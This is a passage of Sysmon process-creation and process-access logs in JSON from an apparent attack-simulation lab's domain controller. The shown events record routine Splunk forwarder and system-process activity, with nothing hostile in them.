C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.242\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-0010F4840500}\r\nProcessId: 3444\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-00104A840500}\r\nParentProcessId: 4504\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.242","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010F4840500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-00104A840500}","ParentProcessId":"4504","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nSourceProcessId: 4504\r\nSourceThreadId: 4516\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010F4840500}\r\nTargetProcessId: 3444\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","SourceProcessId":"4504","SourceThreadId":"4516","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010F4840500}","TargetProcessId":"3444","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010F4840500}\r\nTargetProcessId: 3444\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010F4840500}","TargetProcessId":"3444","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 